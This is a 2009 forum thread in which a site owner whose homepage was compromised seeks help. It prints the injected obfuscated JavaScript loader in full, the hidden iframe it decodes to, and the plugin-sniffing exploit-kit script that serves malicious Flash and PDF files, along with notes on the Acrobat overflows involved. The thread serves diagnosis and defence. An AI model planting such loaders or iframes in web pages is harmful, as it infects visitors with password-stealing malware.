Someone hacked my website!

Discussion in 'Programming' started by [email protected], May 6, 2009.

  1. h@ck3r

    [email protected] New Member

    My forum is located here:

    /forum

    In the root of my domain, I only have an index.php file which is like a disclaimer, within only basic HTML (Enter/ Don't enter).

    Problem is- the past few days.. members started reporting that their anti-virus etc was saying my website is a malicious site, and warning of a virus.

    I use Nod32, and Avast on my PC's, and I was not getting any warning message, but when I visited the root of my domain (index.php), it would auto start ACROBATREADER.EXE

    It would start using VERY HIGH memory resources, but seem to do nothing else.

    After I looked into things closely, I examined the index.php file and found the following code has somehow been added to the file:

    PHP:
    <?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo ''?><?php echo '<script type="text/javascript">var jfbqwCRgMagVAISgjojw = "uxN60uxN105uxN102uxN114uxN97uxN109uxN101uxN32uxN119uxN105uxN100uxN116uxN104uxN61uxN34uxN52uxN56uxN48uxN34uxN32uxN104uxN101uxN105uxN103uxN104uxN116uxN61uxN34uxN54uxN48uxN34uxN32uxN115uxN114uxN99uxN61uxN34uxN104uxN116uxN116uxN112uxN58uxN47uxN47uxN112uxN114uxN111uxN102uxN105uxN45uxN116uxN111uxN111uxN108uxN116uxN105uxN112uxN46uxN98uxN105uxN122uxN47uxN98uxN108uxN111uxN103uxN47uxN102uxN101uxN101uxN100uxN46uxN104uxN116uxN109uxN108uxN34uxN32uxN115uxN116uxN121uxN108uxN101uxN61uxN34uxN98uxN111uxN114uxN100uxN101uxN114uxN58uxN48uxN112uxN120uxN59uxN32uxN112uxN111uxN115uxN105uxN116uxN105uxN111uxN110uxN58uxN114uxN101uxN108uxN97uxN116uxN105uxN118uxN101uxN59uxN32uxN116uxN111uxN112uxN58uxN48uxN112uxN120uxN59uxN32uxN108uxN101uxN102uxN116uxN58uxN45uxN53uxN48uxN48uxN112uxN120uxN59uxN32uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN59uxN32uxN102uxN105uxN108uxN116uxN101uxN114uxN58uxN112uxN114uxN111uxN103uxN105uxN100uxN58uxN68uxN88uxN73uxN109uxN97uxN103uxN101uxN84uxN114uxN97uxN110uxN115uxN102uxN111uxN114uxN109uxN46uxN77uxN105uxN99uxN114uxN111uxN115uxN111uxN102uxN116uxN46uxN65uxN108uxN112uxN104uxN97uxN40uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN61uxN48uxN41uxN59uxN32uxN45uxN109uxN111uxN122uxN45uxN111uxN112uxN97uxN99uxN105uxN116uxN121uxN58uxN48uxN34uxN62uxN60uxN47uxN105uxN102uxN114uxN97uxN109uxN101uxN62";var pCtNiMOUYGQHlsyivQPI = jfbqwCRgMagVAISgjojw.split("uxN");var qwdrEwYolHlaKeosrDNQ = "";for (var JdXvWWeRmuZdqDUuzsjk=1; JdXvWWeRmuZdqDUuzsjk<pCtNiMOUYGQHlsyivQPI.length; JdXvWWeRmuZdqDUuzsjk++){qwdrEwYolHlaKeosrDNQ+=String.fromCharCode(pCtNiMOUYGQHlsyivQPI[JdXvWWeRmuZdqDUuzsjk]);}document.write(qwdrEwYolHlaKeosrDNQ)</script>'?>
    Can anyone tell me how someone's done this as I am the only person with FTP access to my website, other than my host.

    I've removed this code from the index.php file now and it seems to be fine.. But I want to make sure this cannot happen again.

    I've also changed the index.php file for an index.html file.

    I'm also worried that they have uploaded something else on my server too, and not just added this coding. Is there any way to scan the server for a virus? Is this something my host would need to do?

    Can anyone give me any help with this as I need to make sure it doesn't happen again, and that I've totally got rid of it.

    Can't believe this has happened, after only posting in this thread a couple of days ago!

    Is there any way this code has been added to my index.php file because of this? As that's when it all started- as soon as I added dock in rock (I've removed it now).

    Thanks for any help.
     
  2. vForums

    vForums New Member

    Thats base25 code your seeing a way to discise html i seen a exploit for 3.7.5 and up vbulletin ill try post it here to get members aware seems they injected it into your header somehow probably a shell contained in that code since it uses script codes..
     
  3. mmmxiv

    mmmxiv New Member

    I use that dock in rock and I don't have that code. Beleive me, I checked.

    Though I did edit it alot to my wishes.
     
  4. h@ck3r

    [email protected] New Member

    I cannot say 100% that it's down to Dock in Rock.. but for sure somehow this script has been injected to that index.php file, and I need to find out how this has been done :)
     
  5. h@ck3r

    [email protected] New Member

    {<--7%\<-Boiiiiiing->/%7-->}
     
  6. Ab.Nath

    Ab.Nath New Member

  7. nagger

    nagger New Member

    I looked into this a little bit.

    That javascript blabla comes out to:

    Code:
    <iframe width="480" height="60" src="http://profi-tooltip.biz/blog/feed.html" style="border:0px; position:relative; top:0px; left:-500px; opacity:0; filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0); -moz-opacity:0"></iframe>
    It opens an iframe to that dodgey site which then runs the script that contains 2 infected exploits, one being a .swf file and one being an .pdf

    Code:
    <script>
    function mjnhyua() { return 'ra'+'m'; }
    for(i=0;navigator.plugins[i];i++){
    		regexp=new RegExp('.ho.+?wave.+?([0-9]+).+?([0-9]+).+?([0-9]+)');
    var ertdfg = "dfgdfgdfgdf43565gkui";
    		result=regexp.exec(navigator.plugins[i]['description']);
    ertdfg = "dfgdfgdfgdf43565gkui";
    		if(result!=null && result[1]==9 && result[2]==0 && result[3]<124) {
    ertdfg = "dfgdfgdfgdf43565gkui";
    			document.write('<if'+mjnhyua()+'e src="fmocs.swf"></if'+mjnhyua()+'e>');
    ertdfg = "dfgdfgdfgdf43565gkui";
    			break;
    		}
    }
    for(i=0;navigator.plugins[i];i++){
    		name=navigator.plugins[i].name;
    		if(name.indexOf('Adobe Acrobat')!=-1){
    			document.write('<if'+mjnhyua()+'e src="fnocs.pdf"></if'+mjnhyua()+'e>');
    			break;
    		}
    }
    </script>
    
    File: fmocs.swf Status: INFECTED/MALWARE MD5: 04edba09fc62d7f8ed56a346491a3125
    Specifically crafted SWF(flash files) files allow remote file execution when the client has a vulnerable FlashPlayer.A malformed SWF record's value triggers a buffer overflow. The size of the SWF files vary. Usually it's a download and execute shellcode used to download and run a PasswordStealer trojan. It seems that all versions of flashplayer up to 9.0.124.0 are vulnerable ( though we saw malicious pages trying to exploit only version 115 and 47).

    Other file the pdf is This is a generic detection for specially crafted PDF files which exploit different vulnerabilities found in Adobe PDF Reader's Javascript engine in order to execute malicious code on user's computer. The exploitation mainly involves the following two functions:
    util.printf() - if an attacker sends a string long enough to generate a
    stack-based buffer overflow he will then be able to
    execute arbitrary code on user's computer with the
    same level privileges as the user who opened the PDF
    file
    Collab.colectEmailInfo() - a stack-based buffer overflow can be
    caused by passing a string long enough (at least 44952
    characters) as a parameter in the msg field of this
    function.

    The Javascript function containing the actual exploit is specified in the OpenAction tag of the PDF file. Usually this function is encoded using zlib. After decompression sometimes the script is still obscured through one or more layers of encoding in order to avoid detection and make analysis more difficult.
    The javascript code inside the PDF file is used to download and execute other malware on user's computer.


    I can conclude that the following people are vurnable to this exploit:
    people using FlashPlayer 9.0.124.0 and below, or adobe acrobat reader before 8.1.2
     
  8. h@ck3r

    [email protected] New Member

    Thanks for the above- Appreciated.

    But After doing a boot scan with Avast (Nod32 never found anything), I deleted a LOT of stuff from my PC, and I thought it had gone.

    But today the same error appeared again on my website. The code had somehow been injected to my index.html page.

    :(
     
  9. monoxera

    monoxera New Member

    I think you should try export / backup db, delete your FTP, install vb again, import using IMPEX.

    Really, that's what I would do. Sorry if I didn't help. Just wanted to give my opinion :)
     
  10. h@ck3r

    [email protected] New Member

    Cheers bud but my VB is not hacked.

    VB is in the /forum directory.

    The file that has been hacked twice now is my own custom made index.html / index.php file that's in the root of my domain.

    I've now removed this file, and setup a redirect in my .htaccess file.

    Fingers crossed the /forum/index.php file doesn't get injected with this script now though.

    Although I'm still trying to find out how I've been hacked in the first place.
     
  11. vForums

    vForums New Member

    Seems like a <script> code executed from a XSS Vuln in your site. Maybe /admincp/redirect=<script> etcetc
     
  12. h@ck3r

    [email protected] New Member

    Sorry to sound dumb but could you explain that in simple terms (If poss) to me? :D

    Are you saying that something I've installed (xss file) could be injecting this code?
     
  13. bouncer

    bouncer New Member

    Is there a solution, sorry to be obtuse.
     
  14. KrazyFire

    KrazyFire New Member

    if u have cpanel do an antivirus check -.-
     
  15. h@ck3r

    [email protected] New Member

    I've got CPanelX- Is that what you mean?

    I don't see any antivirus checker in there though.. should there be? :/

    EDIT: This is the cpanel I have-

    [​IMG]

    Cant see any virus checker though.
     
  16. h@ck3r

    [email protected] New Member

    Progress... I'm pretty sure this: New Mebroot rootkit infects thousands of websites

    Is the infection we have.

    I just downloaded Prevex, but it wasnt £20 to remove the infections from my PC LOL.

    I'd rather back everything up and format my C drive :D
     
  17. dannyheath

    dannyheath New Member

    i had something like what you did and i told my host to reset my host and it seem to be working now
     

Share This Page